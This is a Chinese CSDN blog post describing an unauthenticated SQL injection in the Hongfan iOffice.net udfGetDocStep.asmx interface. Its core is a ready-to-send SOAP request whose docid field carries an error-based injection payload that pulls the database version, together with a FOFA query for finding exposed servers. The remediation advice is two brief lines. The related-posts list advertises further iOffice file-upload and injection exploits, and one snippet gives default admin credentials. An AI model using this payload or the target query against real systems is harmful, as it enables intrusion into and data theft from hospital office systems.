红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞

最新推荐文章于 2024-06-20 15:09:06 发布
最新推荐文章于 2024-06-20 15:09:06 发布
阅读量332 收藏 2
点赞数 7
文章标签: sql 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/136649760
版权
本文描述了红帆iOffice.net中的SQL注入漏洞,攻击者可通过未认证接口获取敏感数据。建议升级至安全版本并部署防火墙进行防护。
摘要由CSDN通过智能技术生成

1.漏洞介绍

​ 红帆iOffice.net udfGetDocStep.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
--

4.检索特征

FOFA:app=“红帆-ioffice”
在这里插入图片描述

5.POC
POST /ioffice/prg/interface/udfGetDocStep.asmx HTTP/1.1
Host: vulIP
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/GetDocStep"
Content-Length: 565

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
    <GetDocStep xmlns="http://tempuri.org/">
        <docid>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</docid>
    </GetDocStep>
    </soap:Body>
</soap:Envelope>

查询数据库版本信息
在这里插入图片描述

6.修复建议

1.升级至安全版本。
2.部署Web应用防火墙,对数据库操作进行监控。

7.参考信息
qq_36334672
关注
红帆OA udfmr.asmx SQL注入漏洞复现
0xSec
08-18 3857
红帆iOffice.netudfmr.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
红帆iOffice iorepsavexml.aspx接口存在任意文件上传漏洞 附POC
nnn2188185的博客
12-23 562
红帆iOffice iorepsavexml.aspx接口存在任意文件上传漏洞 附POC
漏洞复现】红帆OA iorepsavexml.aspx文件上传漏洞
失心少年
12-16 1052
广州红帆科技深耕医疗行业20余年,专注医院行政管控,与企业微信、阿里钉钉全方位结合,推出web移动一体化办公解决方案——iOffice20(医微云)。提供行政办公、专业科室应用、决策辅助等信息化工具,采取平台化管理模式,取代医疗机构过往多系统分散式管理,实现医院内各科室之间的快速分工合作,并通过整合各类管理应用,让医疗机构管理者随时随地把控医院的运营管理情况,同时为行政管理人员提供便捷多终端的移动协同工具,推进移动办公全面落地,深化互联网+医疗建设,成就面向医疗机构的“智慧管控”。
漏洞复现-红帆OA iorepsavexml.aspx文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-24 1811
漏洞复现-红帆OA iorepsavexml.aspx文件上传漏洞,附带自己写的poc脚本
红帆OA iorepsavexml接口任意文件上传漏洞(含批量验证poc)_ ioffice prg set iocom iodoceditservernew
2401_83974370的博客
04-14 487
红帆OA,即红帆办公自动化系统,是一种基于微软.NET技术开发的办公自动化解决方案。它旨在解决企业或政府办公中遇到的“自动化孤岛”和“信息化孤岛”问题,提供支持信息访问、传递以及跨组织工作的集成化商务环境。红帆OA 存在任意文件上传漏洞,攻击者可通过此漏洞上传webshell木马,获取服务器控制权限。
红帆ioffice ioassistance2.asmx sql注入
weixin_43567873的博客
03-10 106
红帆ioffice ioassistance2.asmx sql注入
红帆ioffice-iocomgetatt-sql注入
weixin_43567873的博客
03-11 133
红帆ioffice-iocomgetatt-sql注入
红帆OA 多处 SQL注入漏洞复现
0xSec
03-04 1010
红帆iOffice.netioDesktopData.asmx、wssRtSyn.asmx、GetWorkUnit.asmx、udfGetDocStep.asmx等接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
红帆OA-ioFileDown接口任意文件读取和CAWS.asmx、udfGetDocStep、wssRtFile接口sql注入
weixin_43567873的博客
03-06 84
红帆OA-ioFileDown接口任意文件读取和CAWS.asmx、udfGetDocStep、wssRtFile接口sql注入
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
nnn2188185的博客
03-04 255
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
IOFFICE-E网络办公系统成功调试版(附SQL数据库)
02-23
源码空间
ioffice-e网络办公系统成功调试版(附sql数据库)
01-09
内带i-office调试动画演示 系统已经安装了.NET 已经下载了ioffice系统,并将ioffice安装到了名为ioffice的虚拟目录下。 首先按照调试演示将database目录里的bak文件还原到ioffice数据库。 在SQL Server中加入一个ioffice的用户,并将ioffice用户的密码设为 "-qww204e"(引号内的内容),赋予ioffice用户访问ioffice数据库的权限。 将ioffice的bin目录下的*.dll以及iOfficeCon.txt文件拷贝到system32目录下(我是把所有文件都拷了进去),注册jmail.dll,命令行下regsvr32 jmail.dll。(否则ioffice的邮件功能不能使用)将system32目录下的iOfficeCon.txt里的localhost改成SQL Server的IP地址。 好了,现在在浏览器里访问http://localhost/ioffice/login.aspx,登录界面应该可以顺利的出来了。 接下来的问题就是ioffice数据库中用户表的Pwd字段加了密,经过对现有用户密码的对比,发现EMPID 为 112,113,114,67,81等的用户密码均为D4-1D-8C-D9-8F-00-B2-04-E9-80-09-98-EC-F8-42-7E估计这个就是系统的默认密码,而这些用户估计没改密码于是把Admin用户的密码改成这个值,接下来就 狂试 默认密码,什么12345,8888 ......试了一堆最后发现这个值对应的密码是 空 ! OK!一切都解决了! IOFFICESQL文件已经修改了里面的存储进程的错误 你们要做的就是建立一个数据库IOFFICE以及一个IOFFICE的登录 另外把那个mrBaseInf表导入,里面又原始的管理员用户的 username:admin PASSWD:admin
漏洞复现】红帆iOffice.net wssRtSyn接口处存在SQL注入
最新发布
2301_80127209的博客
06-20 661
红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
office漏洞汇总
好好学习,天天向上
03-06 242
https://www.cnblogs.com/diligenceday/p/7898839.htmlhttps://cloud.tencent.com/developer/news/200097 CVE-2017-11882 https://blog.csdn.net/darkhq/article/details/79134981 CVE-2018-0802 噩梦公式二代复现https://ww...
暴力破解!ioffice.net 政务系统安装
影子'的专栏
04-17 3914
  单位的政务系统服务器要换了,所有系统盘可用空间就只有15M,晕,放几个word文档就挂了。服务器星期六下午到的货,呵呵,dell 2950 。配置还不错,因为所在的服务器机架只剩下最高的一层有空位了(目测在2米左右),和电脑公司的三个人好不容易才把服务器装去(服务器重10公斤,长1.2米,宽0.6米),然后是安装系统,软件,杀软,防火墙,驱动不用自己装,DELL的安装光盘做是就好啊,一次性引导
2023HW-8月(10-15)53个0day,1day漏洞汇总含POC、EXP
tangshuangsss的专栏
08-16 4979
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介2023HW-8月10-15号0day、1day漏洞汇总(已更新),包含以下漏洞需要自取。链接:https://pan.baidu.com/s/1Tr94yVFSHn_C6YiJcVprAw 提取码:6666通达OAsql注入漏洞 CVE-2023-4165 POC.. 2 通达OAsql注入漏洞 CVE-2023...
实战 | 攻防演练中某市医院的SQL注入
weixin_54787877的博客
05-25 1413
前言 这次演习中打算搞一手医院。 虽然漏洞已上报,但还是会打码。 攻击手法: SQL注入攻击 瓶颈难点: 1.主站 1.sqlmap无法读取数据表 2.无法使用os-shell来getshell 3.网站找不到绝对路径,sql-shell没法写shell 2.医院综合查询系统 有DBA权限但是不能os-shell。 网站找不到绝对路径,sql-shell没法写shell 大家有好思路可以评论一起交流一下哈。 实战过程 1.日常目测一波: 看到搜索框来试试SQL注入和XSS 输入个“单引号”直接中奖,真
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 660
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
uni-app 微信小程序分享
07-27
title: '胶南街道召开“红帆支部”观摩学习暨工作推进会', type: 0, summary: "" } } ``` 在onShareAppMessage方法中,可以设置分享的标题、路径和微信小程序的AppId。在onShareTimeline方法中,可以设置分享到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值